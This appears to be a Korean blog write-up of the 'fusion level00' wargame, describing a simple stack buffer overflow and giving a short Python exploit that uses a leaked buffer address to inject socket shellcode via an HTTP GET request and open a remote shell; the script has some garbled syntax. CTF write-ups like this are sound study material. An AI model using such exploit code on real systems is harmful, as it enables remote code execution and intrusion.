본문 바로가기

Wargames/fusion

fusion level00


간단한 bof 였다. NX가 걸려있지 않고 버퍼의 주소를 알기 때문에 쉘코드를 사용했다. 다만 realpath라는 함수의 용도를 모르겠어서 약간 헤멨었다.

1
2
3
4
5
6
7
8
9
10
11
12
from SunKn0wn import *
 
= remote('192.168.179.151'20000)
r.recvuntil('at 0x')
buf = int(r.recv(8), 16)
print "[*]buffer addr : " + str(hex(buf))
payload = 'A' * 139
payload += p32(buf + 144)
payload += SocketShell32
payload = 'GET ' + payload + ' HTTP/1.1'
r.recvsend(payload)
r.interactive()
cs


'Wargames > fusion' 카테고리의 다른 글

fusion level04  (0) 2016.04.28
fusion level03  (0) 2016.04.25
fusion level02  (0) 2016.04.20
fusion level01  (0) 2016.04.15